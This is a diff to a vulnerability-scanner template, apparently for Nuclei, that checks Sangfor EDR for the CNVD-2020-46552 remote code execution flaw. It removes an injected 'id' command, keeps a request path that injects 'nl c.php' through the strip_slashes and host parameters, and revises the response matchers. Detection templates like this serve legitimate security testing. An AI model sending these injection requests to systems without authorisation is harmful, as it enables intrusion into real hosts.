--- a/cnvd/2020/CNVD-2020-46552.yaml
+++ b/cnvd/2020/CNVD-2020-46552.yaml
@@ -1,6 +1,6 @@
 id: CNVD-2020-46552
 info:
-  name: Sangfor EDR Tool RCE
+  name: Sangfor EDR Tool - Remote Code Execution
   author: ritikchaddha
   severity: critical
   description: There is a RCE vulnerability in Sangfor Endpoint Monitoring and Response Platform (EDR). An attacker could exploit this vulnerability by constructing an HTTP request, and an attacker who successfully exploited this vulnerability could execute arbitrary commands on the target host.
@@ -13,20 +13,13 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=id"
       - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php"
 
-    matchers-condition: or
     matchers:
       - type: dsl
         dsl:
           - 'contains(body, "$show_input = function($info)")'
           - 'contains(body, "$strip_slashes($host)")'
-          - 'status_code == 200'
-        condition: and
-
-      - type: dsl
-        dsl:
-          - 'contains(body, "uid=0(root)")'
+          - 'contains(body, "Log Helper")'
           - 'status_code == 200'
         condition: and
